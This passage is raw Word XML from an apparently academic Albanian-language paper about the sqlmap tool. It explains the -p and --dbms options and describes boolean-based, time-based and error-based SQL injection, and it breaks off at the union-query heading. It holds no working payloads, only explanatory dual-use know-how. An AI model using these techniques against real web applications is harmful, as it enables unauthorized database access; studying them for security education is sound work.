          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C682F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disa nga komandat p</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidRPr="002C682F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>r injektim sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D9CEBA" w14:textId="77777777" w:rsidR="002C682F" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc59567387"/>
    </w:p>
    <w:p w14:paraId="59205A6D" w14:textId="4E252A6F" w:rsidR="002C682F" w:rsidRPr="002C682F" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C682F">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Komanda -p</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="002C682F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4939F0DF" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>map automatikisht  teston të gjitha GET dhe POST parametrat. Kur vlera e  --level është &gt;=2 teston gjithashtu edhe vlerat e HTTP Cookie header. Kur kjo vlere eshte  &gt;=3 teston  HTTP User-Agent dhe  vlerat e HTTP Referer header për SQL injeksionet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA7CB8" w14:textId="4F7B24F5" w:rsidR="002C682F" w:rsidRPr="002C682F" w:rsidRDefault="002C682F" w:rsidP="00CB3339">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Gjithashtu mund t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>specifikohe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> manualisht një listë e parametrave që dëshrirojmë t’i testojmë në sqlmap. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68078801" w14:textId="77777777" w:rsidR="002C682F" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc59567388"/>
    </w:p>
    <w:p w14:paraId="2EEF734A" w14:textId="75652D33" w:rsidR="002C682F" w:rsidRPr="00CB3339" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3339">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Komanda: --dbms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3326AC8F" w14:textId="2D986FF9" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>map në mënyrë automatike detekton sistemin e menaxhimit të bazës së të dhënave të ueb aplikacioneve.  Versioni 9.0 i S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>map, mb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ë</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shtet plotësisht këto sisteme menaxhimi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> të</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>bazë e të dhënave</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6B925" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E9C06C" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   Oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4387AC00" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DE61C1" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   Microsoft SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58F637" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   Microsoft Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA724C" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FB10A" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   Firebird</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7A7E5" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   Sybase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0DF2C" w14:textId="77777777" w:rsidR="002C682F" w:rsidRPr="001B5804" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>·   SAP MaxDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094F01B0" w14:textId="51233E87" w:rsidR="00EF2D7F" w:rsidRDefault="002C682F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nëse për cfarëdo lloj arsye S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ql</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>map dështon në detektimin e back-end DBMS pas identifikimit të ndonjë SQL injek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>timit</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">,  mundësohet emërtimi </w:t>
      </w:r>
      <w:r w:rsidR="008E7B51">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5804">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DBMS sipas vetë preferancave të përdoruesit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260AEE03" w14:textId="530E1914" w:rsidR="00EF2D7F" w:rsidRDefault="00EF2D7F" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE4E496" w14:textId="0E2243E8" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C103060" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc59567377"/>
      <w:r w:rsidRPr="000C31F5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Teknikat e Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441CB7E1" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC706E3" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C31F5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injektimi i bazuar në Boolean</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5FE545" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B86E42" w14:textId="511B6D21" w:rsidR="00EF2D7F" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F52561">
        <w:t>SQL Injek</w:t>
      </w:r>
      <w:r>
        <w:t>timi</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> me bazë Boolean është një teknikë e cila mbështetet në dërgimin e një SQL </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve">në bazën e të dhënave. </w:t>
      </w:r>
      <w:r>
        <w:t>Ky lloj i injektimit detyron aplikacionin të kthejë përgjigje (rezultat) tjetër në</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14730DDE" w14:textId="3C4AF783" w:rsidR="000C31F5" w:rsidRPr="00980D87" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">varësi të pyetjes. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t>Në varësi të rezultatit boolean (</w:t>
      </w:r>
      <w:r>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> ose FALSE), përmbajtja brenda përgjigjes HTTP do të ndryshojë ose do të mbetet e njëjtë. Rezultati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mund të</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> lejo</w:t>
      </w:r>
      <w:r>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> një sulmues të gjykojë nëse ngarkesa e përdorur kthehet </w:t>
      </w:r>
      <w:r>
        <w:t>True</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> ose </w:t>
      </w:r>
      <w:r>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> edhe pse nuk janë </w:t>
      </w:r>
      <w:r>
        <w:t>marrur</w:t>
      </w:r>
      <w:r w:rsidRPr="00F52561">
        <w:t xml:space="preserve"> të dhëna nga baza e të dhënave. </w:t>
      </w:r>
      <w:r>
        <w:t>Sapo të gjendet një dobësi apo backdoor, Sqlmap në mënyrë automatike zëvendëson ose shton SQL query dhe pret përgjigjiet. Këto përgjigjie i krahason dhe i ndan varësisht nga madhësia. Ky sulm është më i ngadalshëm dhe mund të sheh edhe më shumë informata në baz</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t>n e t</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dh</w:t>
      </w:r>
      <w:r w:rsidR="0003327A">
        <w:t>ë</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nave, që mund të jenë të dëmshme për përdoruesit. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF sqlmap_Boolean \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="005B082C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001427DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7B626" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="003A6E31" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004381A3" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc59567378"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injektimi i bazuar në kohë</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="38D0F5AD" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436DAED0" w14:textId="3A48B0E1" w:rsidR="000C31F5" w:rsidRPr="00824BBA" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD4C6A">
        <w:t xml:space="preserve">Time-based SQL injektimi është injektim i llojit inferencial ose sulm me injektim të verbër. Është një lloj sulmi në të cilin nuk transferohen të dhëna midis sulmuesit dhe bazës së të dhënave dhe sulmuesi nuk do të jetë në gjendje të marrë rezultate aq lehtë dhe kjo është edhe njëra nga arsyejet pse quhet edhe një sulm me injeksion të verbër. Një sulmues mund të rindërtojë dhe të krijojë një strukturë të re të bazës së të dhënave brenda bazës së të dhënave. Në një sulm të bazuar në kohë, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD4C6A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">një sulmues dërgon një komandë SQL te serveri me kod për të detyruar një vonesë në ekzekutimin e query-it në mënyrë që nga vonesa e përgjigjes të dihet nëse rezultati është True apo False. Ky lloj i sulmit është nga lloji i sulmeve shumë të ngadalshëm që web </w:t>
      </w:r>
      <w:r w:rsidRPr="00824BBA">
        <w:t xml:space="preserve">aplikacionin mund ta lë në një rrezik të lartë. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF sqlmap_TimeBased \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0004150C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001427DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D835EE" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="003A6E31" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E99D988" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc59567379"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Injektimi i bazuar në gabime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2F3B09BA" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F0FDD0" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="00824BBA" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824BBA">
        <w:t>Error-Based Injektimi mbështetet në mesazhet e gabimit të hedhura nga serveri i bazës së të dhënave për të marrë informacion në lidhje me strukturën e bazës së të dhënave.</w:t>
      </w:r>
      <w:r w:rsidRPr="00824BBA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Në shumë raste gabimi i gjeneruar nga baza e të dhënave është e mjaftueshme që sulmuesi të kuptojë tërësisht bazën e të dhënave. Prandaj çaktivizimi i lajmërimeve të drejtpërdrejta për përdorues ose vizitorë që nuk kanë çasje në të dhëna në web aplikacion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645D4D9" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="00D674B1" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20038331" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="003A6E31" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41CCBA07" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc59567380"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injektimi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bazuar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Union – Query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
